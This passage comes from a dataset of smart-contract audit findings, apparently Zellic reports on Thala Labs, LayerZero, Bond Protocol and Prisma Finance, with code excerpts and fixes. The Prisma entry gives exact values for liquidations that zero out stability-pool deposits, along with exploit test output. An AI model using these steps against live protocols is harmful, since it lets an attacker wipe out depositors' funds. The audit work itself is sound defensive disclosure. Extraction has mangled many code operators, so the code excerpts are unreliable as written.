checks would require a separate review of new data structures and how they interact with the rest of the protocol. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.9 Unable to unregister collateral CoinTypess", + "labels": [ + "Zellic" + ], + "body": "Target: stability_pool Category: Business Logic Likelihood: Medium Severity: Medium : Medium There is currently no way to unregister collateral assets from the protocol. Further- more, there is no mechanism to disincentivize borrowing against collateral assets that no longer meet Thala\u2019s risk framework. During the evolution of the protocol, it is likely that some of the assets that were initially deemed suitable for inclusion in the APD stablecoin protocol no longer satisfy these conditions. For example, the volatility of collateral assets is in no way guaranteed to remain within a range acceptable to the framework. In the event one of the collateral assets becomes too volatile, there would be no way to remove it from the system. Because the stability pool supports all collateral CoinTypes, the inability to remove or discourage the use of the volatile assets could disincentivize APD depositors from supporting the stability pool. For example, it could increase the perceived likelihood of liquidation events that result in losses for stability pool depositors. Thala Labs has identified the need for appropriate mechanisms to disincentivize the use of such collateral assets. The proposal references interest rates for debt bor- rowers. We recommend Thala Labs flesh out these mechanisms so that they can be reviewed. Among the considerable architectural changes that Thala Labs has made, one has been the incorporation of capabilities like asset freezing into the protocol. This func- tionality is present in commit 6de6e464. The update does address our concern, but the code changes are very extensive. Verifying its security and functionality would require a separate review. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.10 Missing oracle stale price check", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: Medium Severity: Medium : Medium The oracle does not keep a time stamp, and there is no infrastructure in place to check for stale prices. struct PriceStore has key { numerator: u64, denominator: u64, } Even if there is a rigorous oracle-updating mechanism, stale price checks can prevent catastrophic outcomes in the event the oracle has issues. During volatile markets or rapid price movements, the true market price could easily deviate from the price in the PriceStore. Allowing users to interact with the proto- col using stale prices opens up the avenue for a multitude of exploits given the large number of ways users can interact with the protocol. For example, they could avoid liquidation events, redeem collateral at favorable prices, borrow excess APD, and so forth. Expand the oracle PriceStore to include time stamps reflecting calls made to oracle: :set_price by the oracle_manager. Additionally, calls made to oracle:)price_of by get_oracle_price should check time stamps against the current time to evaluate whether prices are stale or not. We suggest the protocol managers incorporate a combination of statistical price anal- ysis and market expectations to determine the appropriate time window since the last oracle update. It may also be advisable to incorporate some flexibility into the time window \u2014 for example, it is possible for prices to become increasingly stale during volatile markets with rapid price movements. Zellic Thala Labs We further suggest that Thala Labs make available the processes for updating their price oracle so that we can assess its robustness. Thala Labs has made commendable efforts to mitigate issues due to stale oracle prices: for instance, the project now uses a tiered oracle system that considers factors like staleness. However, the oracle framework has been expanded considerably and would require a separate review to ensure the issue has been fixed. The new oracle system exists in commit 6de6e464. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.11 Centralization risk", + "labels": [ + "Zellic" + ], + "body": "Target: Project Wide Category: Centralization Risk Likelihood: Medium Severity: Medium : Medium There are several mechanisms in which the operators of the protocol can influence the protocol in material ways. Protocol managers can exert control over the following critical operations: 1. Control over the minimum collateralization ratio (MCR) and redemption fees. 2. Vault initialization and collateral CoinTypes used in the protocol. 3. Control over the price oracle. In the most severe cases, control over the aforementioned mechanisms can lead to the following outcomes. Calls to params:)set_params can be used to reduce the value of the MCR such that certain vaults become immediately eligible for liquidation. With their knowledge of the profit and loss awarded to liquidators, a malicious actor with management access could set MCR such that a subsequent vault liquidation would maximize profit. They could combine this with a flash loan to take over the majority of the liquidation rewards and effectively rug the protocol. Additionally, calls to params:)set_params can be used to set redemption fees to ex- cessively high values. Calls to vault:)initialize can be used to register assets that do not meet the criteria of Thala Labs\u2019s risk framework. Because all vaults are supported by one stability pool, this could severely disrupt the economics and incentives for other users to use the system. Lastly, the manager can effectively take over the oracle to set prices as they please. When done maliciously, this could severely disrupt the operation of the protocol in all manners of mechanism. Zellic Thala Labs While it is critical for protocol managers to be able to exert control over the parame- ters and variables mentioned above, this access should be controlled through a multi- signature wallet. In particular, changes to the MCR on existing pools, if made at all, should be done in combination with announcements so that users have ample time to modify their collateralization ratios and avoid liquidation. Most projects utilize multi-signature wallets to mitigate centralization risks and pro- vide an additional layer of security. However, there are no security benefits if access control is not implemented correctly. The keys of a multi-signature wallet should al- ways be stored independently of each other, on physically separate hardware. Should one of the systems be compromised, the damage will be isolated. Make use of hard- ware wallets if possible. Also consider trusted, industry-standard key custody providers. Thala Labs has indicated that a multi-signature wallet (MSafe) will be used to manage centralization risk. However, in the current implementation, it is possible for any ad- dress to be used as the manager account. One possible solution would be to check that the manager account has the MSafe resource. Additional checks could poten- tially be included to verify that the wallet satisfies some requirements for quorum and threshold. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.12 Missing assertion checks for critical protocol parameters", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: Low Severity: Low : Low There are no checks in place to enforce that params:)set_params has been called for a given CoinType prior to calling vault:)initialize: public entry fun initialize(manager: &signer) { assert!(signer:)address_of(manager) =) @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager:)initialized(), ERR_UNINITIALIZED_MANAGER); assert!(!exists)(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); stability_pool:)register_collateral(manager); sorted_vaults:)initialize(manager); move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } If the ParamStore has not been initialized via a call to params:)set_params< CoinType>, subsequent calls to vault functions will fail with unclear error messages. Force the parameters to be set up prior to allowing calls to vault:)initialize by including the following assertion check: public entry fun initialize(manager: &signer) { assert!(signer:)address_of(manager) =) @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager:)initialized(), ERR_UNINITIALIZED_MANAGER); Zellic Thala Labs assert!(!exists)(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); assert!(!exists)(@thala_protocol_v1), ERR_UNINITIALIZED_PARAMSTORE); stability_pool:)register_collateral(manager); sorted_vaults:)initialize(manager); move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } Thala Labs has made extensive changes to the initialization sequence, which would require a separate review to confirm that all protocol parameters are set prior to or during the initialization. These changes are present in commit 6de6e464. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.13 Missing validation checks in set_params", + "labels": [ + "Zellic" + ], + "body": "Target: manager Category: Business Logic Likelihood: Low Severity: Low : Low Currently there are no validation checks in params:)set_params to ensure that the fol- lowing critical protocol parameters are not set to values that break the protocol. public entry fun set_params( manager: &signer, mcr_numerator: u64, mcr_denominator: u64, redeem_fee_numerator: u64, redeem_fee_denominator: u64, ) acquires ParamStore { assert!( signer:)address_of(manager) =) @thala_protocol_v1, error:)invalid_argument(ERR_MANAGER_ADDRESS_MISMATCH), ); if (!exists)(@thala_protocol_v1)) { move_to(manager, ParamStore { mcr_numerator, mcr_denominator, redeem_fee_numerator, redeem_fee_denominator, }); } else { let param_store = borrow_global_mut)(@thala_protocol_v1); param_store.mcr_numerator = mcr_numerator; param_store.mcr_denominator = mcr_denominator; param_store.redeem_fee_numerator = redeem_fee_numerator; param_store.redeem_fee_denominator = redeem_fee_denominator; } } Zellic Thala Labs The rest of the protocol ultimately makes calls to params:)mcr_of and params:)redeem_ fee_of under the assumption that the MCR numerator is greater than the denominator and that the redeem fee numerator is less than the denominator. Because there are no checks on their end, this is likely to result in a combination of failures and, worse, potentially erroneous calculations. Include the following validation checks to ensure numerators are less than denomi- nators: public entry fun set_params( manager: &signer, mcr_numerator: u64, mcr_denominator: u64, redeem_fee_numerator: u64, redeem_fee_denominator: u64, ) acquires ParamStore { assert!( signer:)address_of(manager) =) @thala_protocol_v1, error:)invalid_argument(ERR_MANAGER_ADDRESS_MISMATCH), ); assert!( (mcr_numerator >) mcr_denominator), error:)invalid_argument(ERR_MCR_NUMR_LT_DENOM), ); assert!( (redeem_fee_numerator <) redeem_fee_denominator), error:)invalid_argument(ERR_FEE_NUMR_GT_DENOM), ); if (!exists)(@thala_protocol_v1)) { move_to(manager, ParamStore { mcr_numerator, mcr_denominator, redeem_fee_numerator, redeem_fee_denominator, }); } else { Zellic Thala Labs let param_store = borrow_global_mut)(@thala_protocol_v1); param_store.mcr_numerator = mcr_numerator; param_store.mcr_denominator = mcr_denominator; param_store.redeem_fee_numerator = redeem_fee_numerator; param_store.redeem_fee_denominator = redeem_fee_denominator; } } The initialization changed considerably by commit 6de6e464. Confirming that all the assertions are secure would require a separate review. We note that the new se- quence now sets vault parameters to default values; however, they can be later mod- ified with setter functions, which each need to be reviewed for proper checks. Addi- tionally, the setter functions allow the minimum collateralization ratios to be changed after a vault has been deployed, which could introduce a centralization risk where a protocol owner causes open vaults to be liquidated. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.14 Locked redemption fees", + "labels": [ + "Zellic" + ], + "body": "Target: manager Category: Business Logic Likelihood: High Severity: Low : Low Currently there is no way for the manager to retrieve fees stored in the FeeStore from calls made to manager:)charge_redemption_fee; in vault:)redeem_collateral;. The owners of the protocol would be unable to retrieve redemption fees from the FeeStore. Add an access-controlled method to the manager to allow the protocol owners to re- trieve redemption fees. Thala Labs has made considerable efforts to include the functionality to allow col- lateral withdrawals. In commit 6de6e464, the module thala_protocol_v1:)fees was fleshed out with the withdrawal functionality. However, the changes are extensive and require a separate review. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.15 The ascending insertion search fails to return the tail", + "labels": [ + "Zellic" + ], + "body": "Target: sorted_vaults Category: Business Logic Severity: Low Likelihood: Low : Low The sorted_vaults:)find_insert_position_ascending search algorithm fails to return the tail position: fun find_insert_position_ascending( nominal_cr: u128, start_id: Option
, ): (Option
, Option
) acquires SortedVaults { if (empty()) { return (option:)none(), option:)none()) }; /) check if the insert position is after the tail let tail = get_last(); if (option:)is_none(&start_id)) { let tail_nominal_cr = get_nominal_cr(*option:)borrow(&tail)); if (tail_nominal_cr >) nominal_cr) { return (option:)none(), tail) } }; ...)) The position returned by sorted_vaults:)find_insert_position_ascending does not correspond with a valid insertion position. Fortunately, however, in the current implementation this never happens because fin d_insert_position_ascending is never passed a start_id that is none. Zellic Thala Labs We strongly advise that this coding mistake be fixed. If future iterations extend the current codebase and make calls to this function by passing start_id that is none, it could have material implications for the protocol. Thala Labs has made extensive changes to the sorted vaults implementation. The function containing this bug was removed by commit 6de6e464. It appears as though the issue has been resolved, but complete verification of the new mechanics would require a separate review. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.16 Instances of none in VaultStore.vault", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: Low Severity: Low : Low Calls to vault:)close_vault leave the vault store with a none vault: /) clear resource let vault_store = borrow_global_mut)(account_addr); vault_store.vault = option:)none(); withdrawn_collateral Closing a vault can cause the following getters to fail with an unclear error message: public fun max_borrow_amount(addr: address): u64 acquires VaultStore { assert_vault_store(addr); let vault_store = borrow_global)(addr); let vault = option:)borrow(&vault_store.vault); max_borrow_amount_given_collateral(vault.collateral) } public fun collateral_amount(addr: address): u64 acquires VaultStore { assert_vault_store(addr); let vault_store = borrow_global)(addr); let vault = option:)borrow(&vault_store.vault); (vault.collateral) } public fun debt_amount(addr: address): u64 acquires VaultStore { assert_vault_store(addr); Zellic Thala Labs let vault_store = borrow_global)(addr); let vault = option:)borrow(&vault_store.vault); (vault.debt) } Closed vaults, and hence vault stores with none vaults, remain in the SortedVaults struct. It appears as though this should not cause an issue in the current implementa- tion. It is strongly advised that Thala Labs avoid having fields with none values as this can lead to unexpected failures with unclear error messages. Consider removing VaultStores with none vaults from the SortedVaults struct. Alter- natively, remove the VaultStore for closed vaults entirely. Additionally, inlcude assertion checks for vaults that are not none in the above func- tions. In commit 6de6e464, Thala Labs added a check to ensure that no vaults with zero collateral are added to the system. However, verifying that subsequent withdrawals cannot leave empty vaults in the system requires a separate review of architectural changes. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.17 Missing assertion checks for oracle initialization", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: Low Severity: Low : Low There are no checks in place to enforce that oracle:)set_price has been called for a given CoinType prior to calling vault:)initialize: public entry fun initialize(manager: &signer) { assert!(signer:)address_of(manager) =) @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager:)initialized(), ERR_UNINITIALIZED_MANAGER); assert!(!exists)(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); stability_pool:)register_collateral(manager); sorted_vaults:)initialize(manager); move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } If the PriceStore has not been initialized via a call to oracle:)set_price, calls to vault functions will fail with unclear error messages. Force the oracle to be set up prior to allowing calls to vault:)initialize by including the following assertion check: public entry fun initialize(manager: &signer) { assert!(signer:)address_of(manager) =) @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager:)initialized(), ERR_UNINITIALIZED_MANAGER); Zellic Thala Labs assert!(!exists)(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); assert!(!exists)(@thala_protocol_v1), ERR_UNINITIALIZED_PRICESTORE); stability_pool:)register_collateral(manager); sorted_vaults:)initialize(manager); move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } Thala Labs added checks in commit 853c1f03 to ensure that the oracle is initialized be- fore vault initialization. However, verifying that these checks are secure would require a separate review of extensive changes to both the oracle and the new initialization sequence. Zellic Thala Labs 4 Formal Verification The Move language is developed alongside the Move specification language, which allows for formal specifications to be written and verified by the Move prover. The project did not include any such specifications, so we provided Thala Labs with some ourselves. Writing specifications against this project has a number of obstacles. First, the depen- dencies were fairly out of date, which presented problems for verification. Specifi- cally, the version of the Aptos framework used was incompatible with the current state of the prover, so running the tool required an upgrade. Additionally, the U256 module uses bitwise operators, which are unsupported by the Move prover. In older versions, this module would prevent the prover from being run at all; it now includes specifications that mark problematic functions as opaque. This issue with bitwise operators presented another challenge. The source of this protocol also utilized bitwise operators in a number of places. For instance, ///)) returns a to the power of b. public fun exp(a: u64, b: u8): u64 { let c = 1; while (b > 0) { if (b & 1 > 0) c = c * a; b = b >) 1; a = a * a; }; c } We recommend that Thala Labs use the modulo operator over & 1 in this and other instances. Finally, the state of the prover and the Aptos framework are not quite robust; they are not without bugs. In order to let the prover run on stability_pool.move, it is nec- essary to make minor changes to framework specifications. Additionally, the prover will not work on vault.move or sorted_vaults.move at all, as it consumes far too much memory. Despite these challenges, the prover still presents a powerful way to verify the be- havior of certain functions. The following is a sample of some specifications we have Zellic Thala Labs provided; we strongly recommend that the Thala Labs team add more as well. 4.1 thala_protocol_v1:)apd_coin This module is fairly simple. Here is a basic specification that checks the behavior of mint: spec mint { ///)) Only aborts if uninitialized. aborts_if !has_capabilities(); ///)) Minted value must equal amount. ensures result.value =) amount; } For this module, we provided specifications for all functions: initialization, mint, burn, and initialized.", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "4.2 thala_protocol_v1:)oracle The oracle module is also straightforward to prove. We can show that each of its functions performs necessary checks and changes prices correctly. spec fun has_store(): bool { exists)(@thala_protocol_v1) } spec fun get_store(): PriceStore { global)(@thala_protocol_v1) } spec set_price { ///)) Can only be called by @thala_protocol_v1. aborts_if signer:)address_of(oracle_manager) !) @thala_protocol_v1; ///)) Even if the resource did not exist before, it should exist after. ensures has_store(); ///)) Prices should be properly set. Zellic Thala Labs ensures get_store().numerator =) numerator; ensures get_store().denominator =) denominator; } spec price_of { ///)) Should abort if and only if the resource does not exist. aborts_if !has_store(); ///)) Returned prices should reflect stored values. ensures result_1 =) get_store().numerator; ensures result_2 =) get_store().denominator;", + "labels": [ + "Zellic" + ], + "body": "4.2 thala_protocol_v1:)oracle The oracle module is also straightforward to prove. We can show that each of its functions performs necessary checks and changes prices correctly. spec fun has_store(): bool { exists)(@thala_protocol_v1) } spec fun get_store(): PriceStore { global)(@thala_protocol_v1) } spec set_price { ///)) Can only be called by @thala_protocol_v1. aborts_if signer:)address_of(oracle_manager) !) @thala_protocol_v1; ///)) Even if the resource did not exist before, it should exist after. ensures has_store(); ///)) Prices should be properly set. Zellic Thala Labs ensures get_store().numerator =) numerator; ensures get_store().denominator =) denominator; } spec price_of { ///)) Should abort if and only if the resource does not exist. aborts_if !has_store(); ///)) Returned prices should reflect stored values. ensures result_1 =) get_store().numerator; ensures result_2 =) get_store().denominator; }", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "4.3 thala_protocol_v1:)params This module is similar to thala_protocol_v1:)oracle. Here is what one of the function specifications looks like: spec set_params { ///)) Only be called by @thala_protocol_v1 can set params. aborts_if signer:)address_of(manager) !) @thala_protocol_v1; ///)) Param store should be created if it did not exist. ensures has_store(); ///)) Parameters should be properly set. ensures get_store().mcr_numerator =) mcr_numerator; ensures get_store().mcr_denominator =) mcr_denominator; ensures get_store().redeem_fee_numerator =) redeem_fee_numerator; ensures get_store().redeem_fee_denominator =) redeem_fee_denominator; } The others are also closely analogous to those in the oracle module. Zellic Thala Lab", + "labels": [ + "Zellic" + ], + "body": "4.3 thala_protocol_v1:)params This module is similar to thala_protocol_v1:)oracle. Here is what one of the function specifications looks like: spec set_params { ///)) Only be called by @thala_protocol_v1 can set params. aborts_if signer:)address_of(manager) !) @thala_protocol_v1; ///)) Param store should be created if it did not exist. ensures has_store(); ///)) Parameters should be properly set. ensures get_store().mcr_numerator =) mcr_numerator; ensures get_store().mcr_denominator =) mcr_denominator; ensures get_store().redeem_fee_numerator =) redeem_fee_numerator; ensures get_store().redeem_fee_denominator =) redeem_fee_denominator; } The others are also closely analogous to those in the oracle module. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The sendOFT function call can be blocked", + "labels": [ + "Zellic" + ], + "body": "Target: OFTWrapper Category: Coding Mistakes Likelihood: Low Severity: Low : Low The contract owner can set any bps value of the variables defaultBps and the oftBps [_oft] in the range from 0 to the maximum BPS_DENOMINATOR inclusive. But during the sendOFT function call, the getAmountAndFees function will check that the final bps value is less than BPS_DENOMINATOR and revert the transaction if it equals or more. function getAmountAndFees( address _oft, uint256 _amount, uint256 _callerBps ) public view override returns ( uint256 amount, uint256 wrapperFee, uint256 callerFee ) { uint256 wrapperBps; if (oftBps[_oft] == MAX_UINT) { wrapperBps = 0; } else if (oftBps[_oft] > 0) { wrapperBps = oftBps[_oft]; } else { wrapperBps = defaultBps; } require(wrapperBps + _callerBps < BPS_DENOMINATOR, \u201cOFTWrapper: Fee bps exceeds 100%\u201d); Zellic LayerZero ...)) } In case if the contract owner sets the defaultBps to the maximum BPS_DENOMINATOR value, the sendOFT function call will be blocked for all unassigned _oft addresses. \ufffflso if the maximum oftBps value is set for a specific _oft address, the sendOFT function call with this _oft address will be reverted. Set a limit for the defaultBps and oftBps[_oft] values strictly less than the BPS_DENOM INATOR value. This issue was fixed by LayerZero in commit f11289a5. Zellic LayerZero 4 Audit Results At the time of our audit, the code was not deployed to mainnet evm. During our audit, we discovered 1 low risk findings. LayerZero acknowledged this finding and implemented fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero OFT Wrapper Audit (January 19th 2023) - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The bond expiry_ can be in the past", + "labels": [ + "Zellic" + ], + "body": "Target: BondFixedTermTeller, BondFixedExpiryTeller Category: Business Logic Likelihood: Medium Severity: Medium : Medium There are two functions, namely create() and deploy(), available in both the FixedT erm and FixedExpiry tellers, which do not check whether the expiry_ has passed the current block.timestamp or not. In the case of the deploy function, this implies that a bond token can be created for a past block.timestamp, which could jeopardize the concept of bond tokens and their expiry. function deploy(ERC20 underlying_, uint48 expiry_) external override nonReentrant returns (uint256) { uint256 tokenId = getTokenId(underlying_, expiry_); /) @audit make sure that expiry_ is in the future. /) Only creates token if it does not exist if (!tokenMetadata[tokenId].active) { _deploy(tokenId, underlying_, expiry_); } return tokenId; } For the create function, however, it implies that bondTokens would be issue for an already vested bond position. In both of the aformentioned cases, having the expiry_ in the past could potentially lead to bad user experience as well as undesired results in terms of bond issuance and redemption. We recommend implementing checks that would block the issuance or deployment of bondTokens that have an expiry in the past. Zellic Bond Labs require(expiry_ > block.timestamp, \u201cerror: expiry is in the past\u201d); Bond Labs acknowledged this finding and implemented a fix in commits 4eb523da and 453d02e0. Zellic Bond Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Bond Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Array indexes may be out of bounds", + "labels": [ + "Zellic" + ], + "body": "Target: BondFixedTermTeller Category: Business Logic Likelihood: Informational Severity: Informational : Informational In the batchRedeem function, two arrays are passed as parameters to the function. The two arrays, tokenIds and amounts_, are then accessed in one for loop for the same indices, without prior checking that their lengths are equal. function batchRedeem(uint256[] calldata tokenIds_, uint256[] calldata amounts_) external override nonReentrant { uint256 len = tokenIds_.length; /) @audit make sure that ther lengths are equal for (uint256 i; i < len; +)i) { _redeem(tokenIds_[i], amounts_[i]); } } Should there be a scenario when the lengths mismatch, the out-of-bounds error would trigger the function call to revert altogether at the last index, thus wasting the gas used for the transaction. We recommend implementing a check such that the length of the arrays is properly checked before the for loop. require(tokenIds.length =) amounts_.length, \u201carrays' lengths mismatch\u201d); Bond Labs acknowledged this finding and implemented a fix in commit 436d18ec. Zellic Bond Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Bond Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Removal from callbackAuthorized is not conclusive", + "labels": [ + "Zellic" + ], + "body": "Target: BondBaseSDA Category: Business Logic Likelihood: Medium Severity: Medium : Medium The callbackAuthorized mapping dictates which msg.sender is allowed to perform ca llbacks on a specific market, and it is set via the setCallbackAuthStatus function. The status of this authorization is only checked when the market is created, despite the fact that the msg.sender can lose their rights to perform callbacks in the meanwhile, should the owner decide so. Currently, there are no checks whatsoever, in any of the accompanying contracts, for whether the msg.sender is allowed to perform callbacks on a market. function _createMarket(MarketParams memory params_) internal returns (uint256) { { /) Check that the auctioneer is allowing new markets to be created if (!allowNewMarkets) revert Auctioneer_NewMarketsNotAllowed(); /) Ensure params are in bounds uint8 payoutTokenDecimals = params_.payoutToken.decimals(); uint8 quoteTokenDecimals = params_.quoteToken.decimals(); if (payoutTokenDecimals < 6 |) payoutTokenDecimals > 18) revert Auctioneer_InvalidParams(); if (quoteTokenDecimals < 6 |) quoteTokenDecimals > 18) revert Auctioneer_InvalidParams(); if (params_.scaleAdjustment < -24 |) params_.scaleAdjustment > 24) revert Auctioneer_InvalidParams(); /) Restrict the use of a callback address unless allowed if (!callbackAuthorized[msg.sender] &) params_.callbackAddr !) address(0)) revert Auctioneer_NotAuthorized(); } /) ...)) } Zellic Bond Labs Allowing previously whitelisted msg.sender to perform callbacks may result in unde- sired actions on behalf of the market it previously represented, potentially leading to financial losses. We recommend assuring that once a user has been unwhitelisted, they can no longer perform actions on behalf of the market they originally represented. Bond Labs acknowledged this finding and implemented a fix in commit 00ddf327. Zellic Bond Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Bond Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Data desynchronization", + "labels": [ + "Zellic" + ], + "body": "Target: BondBaseCallback, BondBaseTeller Category: Business Logic Likelihood: Low Severity: Low : Low When creating a market, the user can set the address of the callback contract that will process transfers of the owner\u2019s tokens. To do this, the user should be whitelisted, but deploying the callback contract is not under control by project contract. Therefore, it is not guaranteed that the user will specify the same address of _aggregator contract as the BondBaseTeller contract. As a result, there may be a desynchronization of the market data used to process the token transfer. As a result of a user error, the market may be unusable since it is impossible to edit the corresponding market settings after creation. For the expected operation of the BondBaseCallback contract independent of user actions, we recommend directly passing the payoutToken and quoteToken token ad- dresses to the callback function. Bond Labs acknowledged this finding and implemented a fix in commit 252f64d8. Zellic Bond Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Bond Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.1 High-fraction liquidations can cause the product P to be- come 0", + "labels": [ + "Zellic" + ], + "body": "Target: StabilityPool Category: Business Logic Likelihood: High Severity: Critical : Critical During liquidations, each depositor is rewarded with the collateral and some amount of DebtTokens are burned from their deposits. As it would be impossible to update each user\u2019s balance during liquidation, the protocol uses a global running product P and sum S to derive the compounded DebtToken deposit and corresponding collateral gain as a function of the initial deposit. Refer to the Appendix 7.1 for a list of terms and the derivation of P. Continuous high-fraction liquidations can cause the value of the global-running prod- uct P to become 0, leading to potential disruptions in withdrawals and reward claims from the stability pool. The function _updateRewardSumAndProduct is responsible for updating the value of P when it falls below 1e9 by multiplying it by 1e9. However, certain liquidation scenarios can update P in a way that multiplying it by 1e9 is insufficient to bring its value above 1e9. Refer to the Appendix 7.2 for the exploit of the vulnerability. Following is the output of the exploit: Running 1 test for test/Exploit.t.sol:Exploit [PASS] testPto0Exploit() (gas: 2053310) Logs: Value of P after first liquidation 1000000000 Value of P after second liquidation 2 Value of P after third liquidation 0 Alice's deposits in stability pool before the withdrawal Alice's balance of debttoken before the withdrawal Zellic Prisma Finance Alice's deposits in stability pool after the withdrawal 0 Alice's balance of debttoken after the withdrawal Alice's deposits are now erased from the pool without being returned First thing to note is that if newProductFactor is 1, then multiplying by 1e9 is not enough to bring P back to the correct scale. The value of newProductFactor can be set to 1 by making _debtLossPerUnitStaked equal to 1e18 - 1. This requires calculating the _debtToOffset value to pass to the offset function such that _debtLossPerUnitStaked is 1e18 - 1. The calculations for this are as follows: _debtLossPerUnitStaked = ( _debtToOffset * 1e18 / _totalDebtTokenDeposits ) + 1 1e18 - 1 = ( _debtToOffset * 1e18 / _totalDebtTokenDeposits ) + 1 /) (We need _debtLossPerUnitStaked to be 1e18 - 1) 1e18 - 2 = ( _debtToOffset * 1e18 / _totalDebtTokenDeposits ) Fixing _totalDebtTokenDeposits to 10000 * 1e18 _debtToOffset = 10000e18 * (1e18 - 2) / 1e18 _debtToOffset = 9999999999999999980000 Performing a liquidation with _debtToOffset as 9999999999999999980000 can bring newP from 1e18 to 1e9 in one liquidation, assuming currentP is 1e18, due to the calculation in _updateRewardSumAndProduct: newP = (currentP * newProductFactor * 1e9) / 1e18; (we already know newProductFactor is 1 ) Now, by creating three troves with the required debt amount, each having _debtToOff set as 9999999999999999980000, and subsequently liquidating them while maintaining the deposits in the stability pool at exactly 10,000 * 1e18, P becomes 0. Consequently, users may face difficulties withdrawing from the stability pool. As _debtToOffset is the compositeDebt of the trove (the requested debt amount + debt borrowing fee + debt gas comp), we need to solve the following equation to calculate the _debtAmount needed to open such trove: x + (x * 5000000000000000 / (1e18) ) + (200 * (1e18)) = 9999999999999999980000 Zellic Prisma Finance Here x comes out to be x = 9751243781094527343284. Using this _debtAmount, an attacker may open three troves, and when the ICR < MCR, they can liquidate the troves while maintaining the deposits in the SP to be exactly 10,000 * 1e18. After three liquidations, the value of P becomes 0. Due to this, the function getCompoundedDebtDeposit will return 0 for all the depositors, and thus users would not be able to make any withdrawals from the stability pool. Withdrawals and claimable rewards for any new deposits will fail as P_Snapshot stored for these deposits would be 0. Add an assertion as shown below in _updateRewardSumAndProduct so that such high- fraction liquidations would be reverted. assert(newP > 0); P = newP; emit P_Updated(newP); This issue has been acknowledged by Prisma Finance, and a fix was implemented in commit ecc58eb7. Zellic Prisma Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Prisma Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Incorrect return value in claimableRewardAfterBoost", + "labels": [ + "Zellic" + ], + "body": "Target: PrismaTreasury Category: Coding Mistakes Likelihood: Medium Severity: Informational : Informational There are two issues in the return value of the function claimableRewardAfterBoost: function claimableRewardAfterBoost( address account, address boostDelegate, IRewards rewardContract ) external view returns (uint256 adjustedAmount, uint256 feeToDelegate) { uint256 amount = rewardContract.claimableReward(account); uint256 week = getWeek(); uint256 totalWeekly = weeklyEmissions[week]; address claimant = boostDelegate =) address(0) ? account : boostDelegate; uint256 previousAmount = accountWeeklyEarned[claimant][week]; uint256 fee; if (boostDelegate !) address(0)) { Delegation memory data = boostDelegation[boostDelegate]; if (!data.isEnabled) return (0, 0); fee = data.feePct; if (fee =) type(uint16).max) { try data.callback.getFeePct(claimant, amount, previousAmount, totalWeekly) returns (uint256) {} catch { return (0, 0); } } if (fee >) 10000) return (0, 0); } adjustedAmount = boostCalculator.getBoostedAmount(claimant, amount, previousAmount, totalWeekly); fee = (adjustedAmount * fee) / 10000; return (adjustedAmount, fee); } Zellic Prisma Finance 1. According to the comments of the claimableRewardAfterBoost function, the re- turned value adjustedAmount is the amount received after boost and delegate fees. But fee is not deducted from the adjustedAmount before this value is re- turned. 2. As a fee equaling 10,000 is acceptable by the contract, the function should not return (0,0) when the fee is equal to 10,000. Incorrect values will be reported to the users. Consider implementing the following changes. if (fee >) 10000) return (0, 0); if (fee > 10000) return (0, 0); } adjustedAmount = boostCalculator.getBoostedAmount(claimant, amount, previousAmount, totalWeekly); fee = (adjustedAmount * fee) / 10000; adjustedAmount -= fee; return (adjustedAmount, fee); This issue has been acknowledged by Prisma Finance, and a fix was implemented in 